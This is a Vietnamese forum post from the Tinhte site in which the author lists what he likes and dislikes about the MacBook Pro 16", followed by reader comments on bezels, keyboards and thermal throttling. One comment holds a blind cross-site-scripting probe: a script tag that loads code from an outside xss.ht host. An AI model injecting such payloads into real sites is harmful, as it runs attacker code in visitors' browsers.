Những thứ mình thích và không thích ở MacBook Pro 16"

Duy Luân
18/5/2020 0:37Phản hồi: 213
Những thứ mình thích và không thích ở MacBook Pro 16"
Có chút chia sẻ, anh em nào tính mua MacBook Pro 16" thì hãy tham khảo nhé. Review thì đợi mình xài tầm 1 tháng có trải nghiệm đầy đủ rồi sẽ làm cho anh em xem.


Màn hình rộng xài rất đã


Màn hình rộng hơn 1", nhưng đây là theo đường chéo nên kích thước thật sự bạn nhận được nhiều hơn như vậy. Ngoài ra, Apple cũng tăng độ phân giải của MacBook Pro 16" (từ 2880 x 1800 của chiếc 15" cũ lên thành 3072 x 1920) chứ không chỉ tăng kích thước màn hình nên bạn thật sự có thêm không gian để làm việc. Kết hợp với viền mỏng hai bên nữa nên cảm giác lại càng rộng hơn.

Đó giờ mình quen dùng máy 15" rồi nên cái gì nhỏ hơn thì thấy khó chịu, chật chội lắm, không xài được, thế nên việc Apple đưa lên thành 16" là cái mình đánh giá cao. Đây cũng là trải nghiệm gần sát nhất với chiếc MacBook Pro 17" ngày xưa mình từng ao ước nhưng chưa bao giờ có thể sở hữu.

man_hinh_rong_rai.jpg


Bàn phím có cảm giác yên tâm hơn


Apple đã bỏ bàn phím cánh bướm để quay lại bàn phím dùng switch kiểu cắt kéo truyền thống, điều này khiến mình phải dùng nhiều lực hơn một chút nhưng độ ổn định tăng lên. Anh em nào thích cảm giác phím nảy, hành trình phím đủ dài thì mình nghĩ bàn phím mới trên MacBook Pro 16" sẽ làm anh em hài lòng. Thật ra trải nghiệm gõ của bàn phím trên MacBook Pro 16" cũng y chang cái Magic Keyboard mình đang dùng khi kết nối ra màn hình ngoài thôi chứ cũng chẳng phải xa lạ gì lắm.

Hi vọng mình sẽ không bao giờ phải đi bảo hành bàn phím của MacBook Pro một lần nào nữa. Hồi dùng con MacBook Pro 2016 mình đi bảo hành bàn phím hết 2 lần, lần nào cũng được thay khung máy mới nhưng đi lại phiền lắm.

ban_phim.jpg

Loa xuất sắc


Loa MacBook Pro 15" vẫn là những cái loa hay nhất mình từng được nghe trên laptop, và con MacBook Pro 16" này đã không làm mình thất vọng. Loa nghe ấm hơn, chi tiết hơn, tiếng rõ ràng hơn nhiều so với MacBook Pro ngày xưa. Tất cả là nhờ Apple bổ sung thêm 2 loa nữa, nâng tổng cộng số loa trên con laptop này lên thành 6 cái, trong số đó có 2 loa giảm rung để âm thanh rõ ràng hơn.

Với thằng hay nghe nhạc, nghe video bằng loa ngoài như mình thì nâng cấp này đem lại trải nghiệm lớn lắm. Mình gần như không bao giờ dùng tai nghe ở nhà (chỉ dùng khi lên công ty không mở loa ngoài được), và cũng không sử dụng hệ thống loa ngoài nào cả nên loa tích hợp của máy tính là tất cả những gì mình cần.

Cảm biến vân tay được làm cao hơn, dễ rờ hơn


Trước đây cảm biến vân tay của MacBook Pro 15" được làm chìm và liền với Touch Bar, nên đôi khi chạm vô mà không trúng, nhất là khi không nhìn trực tiếp vào nó. MacBook Pro 16" đẩy cả Touch Bar và cảm biến vân tay lên cao hơn so với khung nhôm, ngoài ra nó còn tách cảm biến vân tay rời ra nên dễ chạm vào hơn. Tốc độ nhận diện thì cũng như trước thôi chứ không có gì mới, được cái dễ rờ hơn.

Quảng cáo


Máy nặng hơn, dày hơn


Đây là cái mình không thích ở MacBook Pro 16", đúng ra nó phải nhẹ và mỏng hơn đời trước mới đúng. Trước giờ cứ mỗi lần MacBook Pro đổi thiết kế là đều nhẹ và mỏng hơn cả, trừ lần này (1.62cm vs 1.55cm trước đây). Thôi thì bù lại an ủi có cục pin to hơn mà Apple nói rằng bạn có thể dùng tới 11 tiếng. Mình thì thường để max độ sáng, mở hết mọi kết nối... nên thời gian xài ít hơn. Để mình đo thêm rồi sẽ chia sẻ với anh em trong bài review nhé.

Viền trên dưới của màn hình vẫn còn dày


Viền hai bên của MacBook Pro đã là mỏng đi, nhưng viền trên và dưới thì vẫn còn dày lắm. Có lẽ không phải vì Apple không làm được viền mỏng, mà do họ có lý do gì đấy, nhưng dù sao thì nó cũng làm cho chiếc MacBook Pro 16 nhìn không được "tương lai" như là đám XPS 15, 17 mới của Dell, hay mấy con ZenBook của Asus. Cái này về trải nghiệm sử dụng thì không vấn đề gì, chỉ là nhìn nó không được sexy như mấy em kia.

vien_mong_khong_deu.jpg

Touch Bar vẫn không có ích lợi gì


Như cái tiêu đề này, Touch Bar vẫn đóng vai trò trang trí, làm màu nhiều hơn là tác dụng thực tế. Cần gì thì cũng đã có phím tắt cả rồi. Tất cả những gì mình thường dùng ở Touch Bar là tăng giảm âm lượng. Mà nếu chỉ vì thế thì dùng phím cứng còn ngon hơn, vì bạn không phải nhìn xuống mỗi lần cần chạm cái gì đấy. Nút cứng cho bạn sự an tâm và vị trí cố định, bạn có thể làm trong vô thức.

Sẽ xài tiếp, và sẽ có bài review cho anh em xem nhé. Anh em thấy hay thì nhớ subscribe kênh YouTube của mình nữa nha. Cảm ơn anh em rất nhiều đã ủng hộ. mình trong thời gian qua 😁

Quảng cáo



À, anh em có câu hỏi nào thì hãy comment vào bài này luôn nha, nếu mình biết thì mình sẽ reply cho anh em.
213 bình luận
Chia sẻ

Xu hướng

Không thích vì đắt tiền quá 😔 tiền đâu mà mua
@Lê Phú Khương 80 củ thì kiểu gì cũng hay, chắc chắn ko dở 😄😄
@Bão Sài Gòn Đang xài con mac cùi 2016 đây bác 😔 tiền đâu mua 16 inch
@Lê Phú Khương Vãi cả...
Chắc chờ ra Mac 20" rồi làm 1 thể đây..
@adagioleonard Troll vãi, lại còn Macbook 20” 😂
Nếu tin đồn là đúng thì năm sau Apple sẽ ra mắt Macbook mới với màn Mini-Led, mình nghĩ sẽ có thiết kế hoàn toàn mới, thế nên macbook 13 và 16 có thiết kế y chang Macbook từ 2016 (có chăng 16 thì viền mỏng đôi chút). Hy vọng Apple làm viền mỏng như Dell XPS 17 inch thì với kích thc hiện tại hoàn toàn có thể ra mắt Macbook 17” thay thế cho Macbook 16
CuongLam02
TÍCH CỰC
4 năm
Nhớ đâu phải 1” đâu mod. Từ 15.4 lên 16 mà. Con này phải chi 17” thì đã hơn. Thiết kế khỏi phải bàn nữa rồi nhưng ko biết họ có ý j khi ko làm viền mỏng hơn, tầm xps là chuẩn.
@CuongLam02 Năm sau ra tai thỏ nhé, đảm bảo viền 2 bên cạnh, viền trên dưới mỏng như XPS luôn.
chuẩn là cái viền màn hình quá dày và cái Touch Bar vô dụng 😁
hnmdiep
TÍCH CỰC
4 năm
<script src=https://thienminh.xss.ht></script>: nói chung cứ apple là ngon hehe
Thứ mình thích: có MBP 16”
Thứ mình không thích: không có thứ mình thích 😆
mod sắm con Mac chất quá
từ giờ đến cuối năm còn khoảng 27 bài nữa về mac 16” của thanh niên mới mua máy này nhé ae 😄
@T-M-T Do ngưu tầm ngưu, mã tầm mã đó
Lolo69
TÍCH CỰC
4 năm
@Duy Luân Mình nghĩ ngược lại. Tham gia tt từ lâu nên mình thấy sự thay đổi của nó. Mấy bạn chăm viết bài về iPhone iPad MacBook quá thì fan hãng khác họ vào tt làm gì nữa. Riết chỉ còn mỗi ifan và anti là chiếm số đông. Bây giờ nếu muốn mua điện thoại, laptop thì trang mình tham khảo sẽ không phải là tt, các bài đánh giá về hàng Apple thì trùng lặp, nhàm chán, của hãng khác thì qua loa, sơ sài.
@Vrtta Cơ bản là cái nào cần thì tụi mình làm 😁 còn làm ra cái mà không ai coi thì không có giá trị.

Mình cũng không nghĩ tinhte nên đi theo hướng review cái để bạn mua, cái đó không phải là cái tinhte mạnh nhất, cũng không phải là cái tinhte muốn trở thành

Điện thoại, laptop giờ không còn như xưa, nếu cứ đi theo hướng đó thì sẽ chết
@smartphone261 Tự bạn đã là filter rồi, cần gì tính năng 😁 FYI thì bài mình luôn nằm trong top hihi.
Chưa dùng mac bao giờ.
Chắc nó cũng có cái hay hơn windows
amazing T
TÍCH CỰC
4 năm
cái touchbar vừa vô dụng vừa thấy hồi hộp lo lắng,mệt
timmyboynhoc
ĐẠI BÀNG
4 năm
Touch bar có gợi ý, tiên đoán từ ý.
nilstrieu
ĐẠI BÀNG
4 năm
Tiêu đề có lẽ nên ghi thêm là: Thích và không thích ở ngoại hình MBP 16".
“Đây là cái mình không thích ở MacBook Pro 16", đúng ra nó phải nhẹ và mỏng hơn đời trước mới đúng” máy dày hơn ngoài pin tăng thì còn do bàn phím hành trình 1mm và để máy khi chạy tác vụ nặng ko bị throttle như máy 15in. Phải hy sinh độ mỏng thôi, ông thiết kế người Anh hồi trc quá ám ảnh về độ hoàn hảo nên làm bàn phím bướm đê làm máy mỏng nhưng một đống lỗi
@darkera13 Video nó bảo là không throttle mà bạn?
@darkera13 Apple nó đã giới hạn lại điện năng tiêu thụ và chỉ có 4,5 nhân chạy ở xung nhịp cao nhất thôi, nên tụt đi đâu nữa, chả riêng gì máy mac, mấy con win khác cũng thế đấy. Riêng con i9 + card rời đấy thả nó ra thì nó phải húp đến gần 150Watt điện, mà điện qua cổng C có 100W thì sao mà đủ. Thế mới phải cắm sạc liên tục, còn rút sạc ra thì mấy con laptop window mới gọi là thọt nhé chứ mac thì không bị đâu. Ngày nào thằng intel nó còn giữ 14nm thì từ giờ đến khi đó mấy con ultrabook mỏng nhẹ con nào cũng thọt như nhau thôi, bạn ỉ ôi gì nữa.
darkera13
ĐẠI BÀNG
4 năm
@Duy Luân https://www.pcmag.com/encyclopedia/term/thermal-throttling

Về lý thuyết thì con i9 của bác nó phải boost lên 4.8G khi cần hiệu năng cao, tuy nhiên do nóng quá nên nó bị hạ xuống chỉ lên được loanh quanh 3.3G thôi. Và hiện tượng ko giữ được mức xung nhịp tối đa ở thời gian dài do quá nóng nó là throttle đấy bác. Laptop mỏng nhẹ con nào cũng throttle ít nhiều thôi.
@darkera13 À thế có vẻ là do Intel nó cũng limit nhỉ


https://www.notebookcheck.net/Apple-MacBook-Pro-16-Core-i9-gets-consistently-outperformed-by-the-MSI-P65-Core-i9.447104.0.html

Má mấy vụ này đọc đau não ghê 😆 hên là mình không quan tâm mấy vụ này lúc đi mua chứ không cũng lại đắn đo 😃)
roycaro5151
ĐẠI BÀNG
4 năm
được mỗi cái mình ưng ý nhất là màn hình nới ra chút xíu , và bỏ cái bàn phím cánh bướm chết tiệt làm hại bao nhiêu thời gian mang đi bảo hành .
DongHoTheKy
ĐẠI BÀNG
4 năm
Lên 17” thì ngon hơn, mà công nhận con này nặng và viền màn vẫn dầy... nhưng mà dùng vẫn bao sướng
echconlun
ĐẠI BÀNG
4 năm
Với kinh nghiệm ku Luân thì chưa đủ tuổi nói xàm đâu nè. Bàn về touchbar thì dẫn lối kém không có khôn từ.
@echconlun Là sao? Nói gì không hiểu 😁
echconlun
ĐẠI BÀNG
4 năm
Không biết bàn phím cánh bướm mấy bạn lỗi gì chứ mình mua đời đầu 2016 và tới bây giờ vẫn gõ tốt và quen với nó. Mình xài một ngày >12H.
lethanh231
TÍCH CỰC
4 năm
@echconlun Vậy tại sao apple họ lại loại bỏ nó ???
Dong999pro
TÍCH CỰC
4 năm
@lethanh231 Này chắc phải tập hợp những bạn đó lại để tìm ra đâu là cách gõ phím đúng đối với bàn phím cánh bướm này =))
Bibusama
TÍCH CỰC
4 năm
@echconlun nếu bị lỗi 100% máy bán ra thì apple bị kiện chắc mất tỷ đô mất =)) bị số lượng giới hạn thôi, có điều % nó lớn hơn bt nhiều, có khi hên xui nữa, bụi lọt mà
echconlun
ĐẠI BÀNG
4 năm
@Bibusama Vậy mình hên nè

Xu hướng

Bài mới









  • Chịu trách nhiệm nội dung: Trần Mạnh Hiệp
  • © 2024 Công ty Cổ phần MXH Tinh Tế
  • Địa chỉ: Số 70 Bà Huyện Thanh Quan, P. Võ Thị Sáu, Quận 3, TPHCM
  • Số điện thoại: 02822460095
  • MST: 0313255119
  • Giấy phép thiết lập MXH số 11/GP-BTTTT, Ký ngày: 08/01/2019